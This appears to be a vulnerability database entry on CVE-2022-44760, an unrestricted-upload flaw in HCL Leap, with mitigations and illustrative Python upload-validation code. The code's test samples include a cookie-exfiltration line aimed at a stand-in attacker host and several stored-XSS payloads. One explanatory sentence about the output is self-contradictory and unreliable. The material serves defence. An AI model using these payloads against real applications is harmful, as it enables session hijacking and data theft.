CVE-2022-44760: CWE-434 Unrestricted Upload of File with Dangerous Type in HCL Software HCL Leap
Unsafe default file type filter policy in HCL Leap allows execution of unsafe JavaScript in deployed applications.
AI Analysis
Technical Summary
CVE-2022-44760 is a vulnerability in HCL Software's HCL Leap low-code platform, affecting versions 9.0 through 9.3 according to the record. The root cause is the default file type filter policy applied to files uploaded through deployed Leap applications: the default policy does not block file types that a browser will execute, so anyone who can submit an attachment to an affected application can store JavaScript, or markup that carries it, on the server. The weakness is classified as CWE-434, Unrestricted Upload of File with Dangerous Type. The practical consequence is not server-side code execution but script execution in the browsers of other users: the uploaded file is served from the application's own origin, so when another user opens it the script runs with that user's session, which is a stored cross-site scripting condition. From there an attacker can read or act on data the victim's session can reach, perform workflow actions as the victim, or inject further content into the application. The record does not state privilege or interaction requirements for exploitation; in practice the attacker needs whatever access the affected application grants to upload a file, which depends on how the form has been published, and the script only runs once a victim opens the uploaded file, so some user interaction is involved. No exploitation in the wild had been reported at the time of this analysis. The CVE record carries no patch link, so administrators should consult HCL's own advisory for the fixed release rather than assume none exists. The CVE was reserved on 2022-11-04 and published in April 2025, an unusually long gap between reservation and disclosure. The record was later enriched by CISA's ADP process, which adds metadata such as CWE and CVSS to the entry; that enrichment is a data-quality step, not an independent assessment of severity.
Potential Impact
For European organizations running HCL Leap 9.0 to 9.3, this is a medium-severity issue whose effect is script execution in the browsers of users of the affected applications. Leap is typically used to build forms and workflow applications that handle personal data, HR records or financial approvals, so a script running in a legitimate user's session can read or submit that data, hijack the session, or perform workflow actions as that user. Script running on the application origin can also redirect users to attacker-controlled content, turning a trusted internal application into a delivery point for phishing or malware, although the vulnerability itself gives no access to the server or the internal network. Where personal data is involved, the GDPR breach notification and accountability obligations apply, with the associated legal and financial exposure. Availability impact is limited; at most, malicious uploads could break the pages that reference them. The medium rating reflects two constraints that organizational controls can tighten: the attacker must first be able to upload a file to an affected application, and a victim must then open it. Against that, the insecure default means every application deployed without a deliberately hardened filter policy is exposed.
Mitigation Recommendations
1. Replace the default file type filter policy with an explicit allowlist of the types your forms actually need (for example PDF, PNG, JPEG and the office formats you process) and reject everything else, in particular .html, .htm, .js, .svg, .xhtml and .xml, all of which a browser may render or execute. Apply the same allowlist at any reverse proxy in front of Leap.
2. Validate uploads server-side beyond the extension: check that the leading bytes match the declared type, reject polyglots that contain script or HTML markup, never trust the client-supplied Content-Type or filename, and store files under a generated name.
3. Serve uploaded files with a fixed Content-Type, X-Content-Type-Options: nosniff and Content-Disposition: attachment, ideally from a separate download origin, so that a file that slips through cannot run in the application's origin. A Content-Security-Policy on the application pages additionally limits what an injected script can load or contact.
4. Monitor upload activity: alert on uploads with unexpected extensions or mismatched content, on double extensions such as report.pdf.html, and on bursts of uploads from a single account or from anonymous forms.
5. Keep upload storage outside the web root with execution disabled; this matters wherever a web server or proxy in front of Leap could interpret stored files.
6. Obtain the fixed release from HCL's advisory for this CVE and apply it. The measures above reduce exposure but do not replace the fix.
7. Train the developers who build Leap applications on which attachment types are safe to accept and why the default policy must not be relied on.
8. Use a WAF rule set that inspects multipart uploads for disallowed extensions and script markup as a compensating control; treat it as a second line rather than the primary one, since encoded or polyglot content can evade it.
9. Restrict which users and which forms can accept attachments at all; anonymous forms that accept uploads carry the highest risk.
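The following is an added example, written for this page; it is not HCL Leap's filter code and not part of the advisory. It shows, side by side, the deny-list style of filter that produces a CWE-434 condition of the kind described in the Technical Summary, and an allowlist validator plus download headers implementing recommendations 1, 2, 3 and 5 above. The sample uploads, the function names and the allowlist contents are all constructed for illustration.

```python
"""Upload type filtering: a deny-list that lets browser-executable files
through, beside an allowlist validator that checks name, extension, magic
bytes and embedded markup, and serves stored files so they cannot run on
the application's origin. Illustrative code, not HCL Leap's implementation."""
import hashlib
import os
import re

# --- The unsafe pattern (hypothetical, shown only to contrast with the fix) ---
# A deny-list blocks a few "obviously dangerous" extensions and accepts the
# rest, so .js, .html, .svg and .xhtml reach the browser from the app origin.
UNSAFE_DENYLIST = {".exe", ".bat", ".cmd", ".sh", ".php"}


def unsafe_denylist_filter(filename):
    """Accepts everything not explicitly denied: the CWE-434 pattern."""
    return os.path.splitext(filename.lower())[1] not in UNSAFE_DENYLIST


# --- Hardened policy ---
# Allowlist of types the application needs: the magic bytes each must start
# with and the Content-Type it is served under. Absent on purpose: .html,
# .htm, .js, .svg, .xml, .xhtml, all of which a browser may render or execute.
ALLOWED_TYPES = {
    ".png":  ((b"\x89PNG\r\n\x1a\n",), "image/png"),
    ".jpg":  ((b"\xff\xd8\xff",), "image/jpeg"),
    ".jpeg": ((b"\xff\xd8\xff",), "image/jpeg"),
    ".gif":  ((b"GIF87a", b"GIF89a"), "image/gif"),
    ".pdf":  ((b"%PDF-",), "application/pdf"),
}
MAX_BYTES = 10 * 1024 * 1024

# Markup a browser would execute if the file were ever rendered inline. This
# is a heuristic second line behind the magic-byte check; binary data can
# occasionally trip it, so log the rejection reason rather than fail silently.
ACTIVE_CONTENT = re.compile(
    rb"<\s*(script|iframe|object|embed|svg|html|meta|link)\b|javascript:|\bon[a-z]+\s*=",
    re.IGNORECASE,
)


def validate_upload(filename, data):
    """Return (accepted, reason, stored_name).

    stored_name is the content hash plus the allowed extension, so the
    client-supplied name (paths, double extensions, odd characters) never
    reaches the filesystem or a URL."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base.startswith("."):
        return False, "bad-name", None
    ext = os.path.splitext(base.lower())[1]      # last extension decides
    if ext not in ALLOWED_TYPES:
        return False, f"type-not-allowed:{ext or 'none'}", None
    if len(data) == 0 or len(data) > MAX_BYTES:
        return False, "bad-size", None
    magics, _ = ALLOWED_TYPES[ext]
    if not any(data.startswith(m) for m in magics):
        return False, "content-mismatch", None
    if ACTIVE_CONTENT.search(data):
        return False, "active-content", None
    stored = hashlib.sha256(data).hexdigest()[:16] + ext
    return True, "ok", stored


def download_headers(stored_name):
    """Headers for serving a stored file: fixed Content-Type from the
    allowlist, nosniff so the browser cannot reinterpret the bytes,
    attachment disposition so it is never rendered as a document on this
    origin, and a sandboxing CSP in case a client ignores the disposition."""
    _, content_type = ALLOWED_TYPES[os.path.splitext(stored_name)[1]]
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
        "Cache-Control": "no-store",
    }


# Constructed sample uploads (not real files from any system).
SAMPLES = {
    "logo.png":      b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,
    "hook.js":       b"document.location='https://attacker.example/?c='+document.cookie",
    "logo.png.html": b"<html><script>alert(1)</script></html>",
    "chart.svg":     b"<svg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'/>",
    "photo.png":     b"\x89PNG\r\n\x1a\n<script>alert(1)</script>",  # polyglot
    "../../app.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:15} denylist={unsafe_denylist_filter(name)!s:5} "
              f"allowlist={validate_upload(name, blob)[:2]}")
```

Run stand-alone, the block prints one line per sample: the deny-list accepts every sample except none of them carries a denied extension, while the allowlist rejects the .js, .svg and double-extension names on type, the PNG-prefixed script polyglot on content, and the path-traversal name before it is even typed. The .svg case is the one most often missed in real allowlists: it is an image format, but it is XML that can carry script, so it belongs with .html, not with .png.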
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Belgium, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: HCL
- Date Reserved: 2022-11-04T21:08:27.038Z
- CISA Enriched: true
Threat ID: 682d983ec4522896dcbefe3d
Added to database: 5/21/2025, 9:09:18 AM
Last enriched: 6/24/2025, 3:41:15 PM
Last updated: 7/30/2025, 6:10:54 AM